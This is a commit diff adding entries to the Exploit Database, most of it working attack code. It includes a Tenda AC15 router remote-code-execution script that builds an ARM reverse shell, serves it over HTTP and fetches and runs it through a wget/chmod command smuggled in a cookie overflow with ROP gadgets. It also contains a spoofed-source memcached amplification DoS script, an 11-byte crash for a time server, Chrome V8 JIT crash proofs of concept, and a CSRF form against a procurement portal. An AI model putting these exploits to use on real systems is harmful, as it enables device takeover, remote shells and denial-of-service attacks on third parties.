DB: 2018-03-07

8 changes to exploits/shellcodes

Memcached - 'memcrashed' Denial of Service
Softros Network Time System Server 2.3.4 - Denial of Service
Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug
Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_
Chrome V8 JIT - 'GetSpecializationContext' Type Confusion
Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read

Tenda AC15 Router - Unauthenticated Remote Code Execution

Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)
Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)

Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download
Bravo Tejari Web Portal - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-03-07 05:01:51 +00:00
parent 6a017b10c8
commit 9897272892
9 changed files with 757 additions and 2 deletions

243
exploits/hardware/remote/44253.py Executable file
View file

@ -0,0 +1,243 @@
#!/usr/bin/env python
# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
import urllib2
import struct
import time
import socket
from optparse import *
import SimpleHTTPServer
import SocketServer
import threading
import sys
import os
import subprocess
ARM_REV_SHELL = (
"#include <sys/socket.h>\n"
"#include <sys/types.h>\n"
"#include <string.h>\n"
"#include <stdio.h>\n"
"#include <netinet/in.h>\n"
"int main(int argc, char **argv)\n"
"{\n"
" struct sockaddr_in addr;\n"
" socklen_t addrlen;\n"
" int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
" memset(&addr, 0x00, sizeof(addr));\n"
" addr.sin_family = AF_INET;\n"
" addr.sin_port = htons(%d);\n"
" addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
" dup2(sock, 0);\n"
" dup2(sock, 1);\n"
" dup2(sock, 2);\n"
" system(\"/bin/sh\");\n"
"}\n"
)
REV_PORT = 31337
HTTPD_PORT = 8888
DONE = False
"""
* This function creates a listening socket on port
* REV_PORT. When a connection is accepted it updates
* the global DONE flag to indicate successful exploitation.
* It then jumps into a loop whereby the user can send remote
* commands to the device, interacting with a spawned /bin/sh
* process.
"""
def threaded_listener():
global DONE
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
host = ("0.0.0.0", REV_PORT)
try:
s.bind(host)
except:
print "[+] Error binding to %d" %REV_PORT
return -1
print "[+] Connect back listener running on port %d" %REV_PORT
s.listen(1)
conn, host = s.accept()
#We got a connection, lets make the exploit thread aware
DONE = True
print "[+] Got connect back from %s" %host[0]
print "[+] Entering command loop, enter exit to quit"
#Loop continuosly, simple reverse shell interface.
while True:
print "#",
cmd = raw_input()
if cmd == "exit":
break
if cmd == '':
continue
conn.send(cmd + "\n")
print conn.recv(4096)
"""
* Take the ARM_REV_SHELL code and modify it with
* the given ip and port to connect back to.
* This function then compiles the code into an
* ARM binary.
@Param comp_path This should be the path of the cross-compiler.
@Param my_ip The IP address of the system running this code.
"""
def compile_shell(comp_path, my_ip):
global ARM_REV_SHELL
outfile = open("a.c", "w")
ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
outfile.write(ARM_REV_SHELL)
outfile.close()
compile_cmd = [comp_path, "a.c","-o", "a"]
s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
while s.poll() == None:
continue
if s.returncode == 0:
return True
else:
print "[x] Error compiling code, check compiler? Read the README?"
return False
"""
* This function uses the SimpleHTTPServer module to create
* a http server that will serve our malicious binary.
* This function is called as a thread, as a daemon process.
"""
def start_http_server():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
print "[+] Http server started on port %d" %HTTPD_PORT
httpd.serve_forever()
"""
* This function presents the actual vulnerability exploited.
* The Cookie header has a password field that is vulnerable to
* a sscanf buffer overflow, we make use of 2 ROP gadgets to
* bypass DEP/NX, and can brute force ASLR due to a watchdog
* process restarting any processes that crash.
* This function will continually make malicious requests to the
* devices web interface until the DONE flag is set to True.
@Param host the ip address of the target.
@Param port the port the webserver is running on.
@Param my_ip The ip address of the attacking system.
"""
def exploit(host, port, my_ip):
global DONE
url = "http://%s:%s/goform/exeCommand"%(host, port)
i = 0
command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
#Guess the same libc base continuosly
libc_base = ****
curr_libc = libc_base + (0x7c << 12)
system = struct.pack("<I", curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack("<I", curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack("<I", curr_libc + ****)
password = "A"*offset
password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
print "[+] Beginning brute force."
while not DONE:
i += 1
print "[+] Attempt %d" %i
#build the request, with the malicious password field
req = urllib2.Request(url)
req.add_header("Cookie", "password=%s"%password)
#The request will throw an exception when we crash the server,
#we don't care about this, so don't handle it.
try:
resp = urllib2.urlopen(req)
except:
pass
#Give the device some time to restart the
time.sleep(1)
print "[+] Exploit done"
def main():
parser = OptionParser()
parser.add_option("-t", "target", dest="host_ip", help="IP address of the target")
parser.add_option("-p", "port", dest="host_port", help="Port of the targets webserver")
parser.add_option("-c", "comp-path", dest="compiler_path", help="path to arm cross compiler")
parser.add_option("-m", "my-ip", dest="my_ip", help="your ip address")
options, args = parser.parse_args()
host_ip = options.host_ip
host_port = options.host_port
comp_path = options.compiler_path
my_ip = options.my_ip
if host_ip == None or host_port == None:
parser.error("[x] A target ip address (-t) and port (-p) are required")
if comp_path == None:
parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
if my_ip == None:
parser.error("[x] Please pass your ip address (-m)")
if not compile_shell(comp_path, my_ip):
print "[x] Exiting due to error in compiling shell"
return -1
httpd_thread = threading.Thread(target=start_http_server)
httpd_thread.daemon = True
httpd_thread.start()
conn_listener = threading.Thread(target=threaded_listener)
conn_listener.start()
#Give the thread a little time to start up, and fail if that happens
time.sleep(3)
if not conn_listener.is_alive():
print "[x] Exiting due to conn_listener error"
return -1
exploit(host_ip, host_port, my_ip)
conn_listener.join()
return 0
if __name__ == '__main__':
main()

90
exploits/linux/dos/44254.py Executable file
View file

@ -0,0 +1,90 @@
# Written by Alex Conrey
# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44254.zip
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This was created to better understand the memcrashed exploit
# brought to light thanks to CloudFlare.
# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
#
# Please sysadmin responsibly.
import requests
import memcache
import re
from scapy.all import *
# Vulnerable memcached server list
SERVER_LIST = [
'172.17.0.2:11211',
]
# Destination
TARGET = '1.2.3.4'
# optional payload to set if no keys exist
payload = requests.get('https://google.com').text
payload_key = 'fuckit'
# this forces payload to load into memory for being extra-evil and efficient
if not payload:
print 'Could not import payload, continuing anyway'
try:
for server in SERVER_LIST:
if ':' in server:
server = server.split(':')[0]
ip = IP(src=TARGET, dst=server)
packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
# fetch known keys by id
statitems_packet = packet_base.format('stats items')
udp = UDP(sport=50000, dport=11211)/statitems_packet
keyids = []
resp = sr1(ip/udp)
for key in str(resp.payload).split('\r\n'):
# Skip first line which has hex in it (I'm lazy)
if 'age' in key:
key = key.split(':')[1]
keyids.append(key)
# fetch names for keys by id
keys = []
for kid in keyids:
query = 'stats cachedump {0} 100'.format(kid)
keyid_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/keyid_packet
resp = str(sr1(ip/udp).payload).split('\r\n')
for key in resp:
if 'ITEM' in key:
res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
keys.append(res.group('keyname'))
# if keys not present on target, make one
if not keys:
mc = memcache.Client([server],debug=False)
mc.set(payload_key, payload)
keys.append(payload_key)
# iterate thru known keys and blast away
for key in keys:
query = 'get {0}'.format(key)
fun_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/fun_packet
sr1(ip/udp)
except Exception:
raise

View file

@ -0,0 +1,72 @@
/*
I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0
Here's a snippet.
case IrOpcode::kStoreField: {
FieldAccess access = FieldAccessOf(node->op());
Node* value_node = node->InputAt(1);
NodeInfo* input_info = GetInfo(value_node);
MachineRepresentation field_representation =
access.machine_type.representation();
// Make sure we convert to Smi if possible. This should help write
// barrier elimination.
if (field_representation == MachineRepresentation::kTagged &&
TypeOf(value_node)->Is(Type::SignedSmall())) {
field_representation = MachineRepresentation::kTaggedSigned;
}
WriteBarrierKind write_barrier_kind = WriteBarrierKindFor(
access.base_is_tagged, field_representation, access.offset,
access.type, input_info->representation(), value_node);
ProcessInput(node, 0, UseInfoForBasePointer(access));
ProcessInput(node, 1,
TruncatingUseInfoFromRepresentation(field_representation));
ProcessRemainingInputs(node, 2);
SetOutput(node, MachineRepresentation::kNone);
if (lower()) {
if (write_barrier_kind < access.write_barrier_kind) {
access.write_barrier_kind = write_barrier_kind;
NodeProperties::ChangeOp(
node, jsgraph_->simplified()->StoreField(access));
}
}
return;
}
Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node.
But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier.
Note: It's the same when handling kStoreElement.
PoC 1 using kStoreField.
*/
var a, b; // should be var
for (var i = 0; i < 100000; i++) {
b = 1;
a = i + -0; // -0 is a number, so this will make "a" a heap object.
b = a;
}
print(a === b); // true
gc();
print(a === b); // false
print(b);
/*
PoC 2 using kStoreElement.
let arr = [{}];
var v; // should be var
for (var i = 0; i < 700000; i++) {
arr[0] = 1;
v = i + -0;
arr[0] = v;
}
print(arr[0] === v) // true
gc();
print(arr[0] === v) // false
print(arr[0]);
*/

View file

@ -0,0 +1,31 @@
/*
I think this commit has introduced the bug.
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
return NoChange();
}
instance_map = Map::GetObjectCreateMap(prototype_const);
PoC:
*/
var object;
function opt() {
opt['x'] = 1.1;
try {
Object.create(object);
} catch (e) {
}
for (let i = 0; i < 1000000; i++) {
}
}
opt();
object = opt;
opt();

View file

@ -0,0 +1,47 @@
PoC:
function* opt(arg = () => arg) {
let tmp = opt.x; // LdaNamedProperty
for (;;) {
arg;
yield;
function inner() {
tmp;
}
break;
}
}
for (let i = 0; i < 100000; i++) {
opt();
}
/*
PoC for release build:
function* opt(arg = () => {
arg;
this;
}, opt) {
let tmp = arg.x;
for (;;) {
arg;
yield;
tmp = {
inner() {
tmp;
}
};
}
}
for (let i = 0; i < 10000; i++) {
opt();
}
What happened:
1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
*/

View file

@ -0,0 +1,57 @@
/*
In the current implementation, the bytecode generator also emits empty jump tables.
https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89
So the bytecode for the example code would be generated as follows:
Code:
function* opt() {
for (;;)
if (true) {
} else {
yield; // never reaches, never hits BindJumpTableEntry
}
}
Bytecode:
...
0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY
...
Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table.
void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() {
if (table_offset_ >= table_end_) return;
current_ = accessor_->GetConstantAtIndex(table_offset_);
Isolate* isolate = accessor_->bytecode_array()->GetIsolate();
while (current_->IsTheHole(isolate)) {
++table_offset_;
++index_;
current_ = accessor_->GetConstantAtIndex(table_offset_);
}
}
If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur.
PoC:
*/
function* opt() {
for (;;)
if (true) {
} else {
yield;
}
for (;;)
if (true) {
} else {
yield; yield; yield; yield; yield; yield; yield; yield;
}
}
for (let i = 0; i < 100000; i++)
opt();

View file

@ -0,0 +1,98 @@
Exploit Title: Bravo Tejari Web Portal-CSRF
CVE-ID: CVE-2018-7216
Vulnerability Type: Cross Site Request Forgery (CSRF)
Vendor of Product: Tejari
Affected Product Code Base: Bravo Solution
Affected Component: Web Interface Management.
Attack Type: Local - Authenticated
Impact: Unauthorised Access
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
Vulnerability Type: Cross Site Request Forgery (CSRF)
Vendor of Product: Tejari
Affected Product Code Base: Bravo Solution
Affected Component: Web Interface Management.
Attack Type: Local - Authenticated
Impact: Unauthorised Access
Product description:
Bravo Tejari is a strategic procurement platform that enables organizations
to generate more value, influence innovation and reduce risk powered by a
unique supplier-centered approach that integrates supplier lifetime value
throughout the entire procurement process
Attack Scenario:
The Web Interface of the Bravo Tejari procurement portal does not use
random tokens to block any kind of forged requests. An atacker can take
advantage of this scenario and create a forged request to edit user account
details like name, address of the company/individual, email address etc. He
then uses social engineering techniques to target specific individuals
whose account details he would like to change. He simply sends the link and
tricks the user into clicking the forged http request. The request is
executed and user account details are changed without his knowledge.
Proof of Concept Code:
Forged HTTP Request used by the attacker:
<html>
<body>
<form action="https://XXXX.XXXX.com/esop/toolkit/profile/regData.do"
method="POST">
<input type="hidden" name="userAct" value="confirmData" />
<input type="hidden" name="from" value="registration&#95;data" />
<input type="hidden" name="actionNumber" value="0" />
<input type="hidden" name="companyExtStatusCode" value="31" />
<input type="hidden" name="companyExtStatusNote" value="" />
<input type="hidden" name="hideCompany" value="false" />
<input type="hidden" name="companyName"
value="XYZ&#32;COMPUTER&#32;SYSTEMS&#32;FZ&#32;LLC" />
<input type="hidden" name="companyAddress"
value="Dubai&#32;internet&#32;city&#44;&#32;DUBAI" />
<input type="hidden" name="companyCity" value="DUBAI" />
<input type="hidden" name="companyCountry" value="AE" />
<input type="hidden" name="companyProvince" value="Dubai" />
<input type="hidden" name="companyZip" value="25703" />
<input type="hidden" name="companyPhone" value="43918600" />
<input type="hidden" name="companyFax" value="" />
<input type="hidden" name="companyEmail"
value="XYZ&#46;v&#64;XYZ&#46;com" />
<input type="hidden" name="companyWebSite" value="" />
<input type="hidden" name="companyLegalStructure" value="" />
<input type="hidden" name="companyAddress2" value="" />
<input type="hidden" name="companyFiscalCode" value="215703" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact:
The affected product is a procurement portal and so all communication
regarding the contract lifecycle process is sent to user details provided
on the portal. If this vulnerability is sucessfully exploited, the attacker
will be able to change these details which will potentially affect the
victim's business.
Recommendation:
Ensure that all sensitive CRUD Operations are appropriately protected with
random tokens. Alternatively, the sensitive operations should also have an
authentication layer to confirm user verification.
References:
http://seclists.org/fulldisclosure/2018/Feb/44
https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html
https://www.securityfocus.com/archive/1/541782/30/0/threaded
Credit: Arvind Vishwakarma
http://ultimateone1.blogspot.ae/
Vulnerability Timeline:
12th December 2017 Vulnerability Discovered
23rd December 2017 Contacted Vendor No Response
7th January 2018 Contacted Vendor again No Response
15th February 2018 Vulnerability Disclosed

View file

@ -0,0 +1,109 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=============
www.softros.com
https://nts.softros.com/downloads/
Product:
===========
Network Time System Server v2.3.4
Both x86/x64 versions
Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
establishing an interconnected time synchronization system for each and every machine and device on the company network.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2018-7658
Security Issue:
================
Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization
could then potentially be impacted.
Stack dump:
'''
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
Resetting default scope
FAULTING_IP:
NTSServerSvc+69a5
004069a5 880a mov byte ptr [edx],cl
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
ExceptionCode: c0000005 (Access violation)
'''
Exploit/POC:
=============
import socket
#Network Time System (Server) NTSServerSvc.exe v2.3.4
#Softros Systems
#NTS Server service for time synchronization over network
print 'Network Time Server 11 byte Denial Of Service'
print 'by hyp3rlinx'
HOST=raw_input('Network Time Server IP')
PORT=7001
payload='A'*11
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload)
s.close()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 10, 2018
Second attempt : February 24, 2018
Request CVE, assigned by Mitre : March 3, 2018
March 5, 2018: Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

View file

@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,

Can't render this file because it is too large.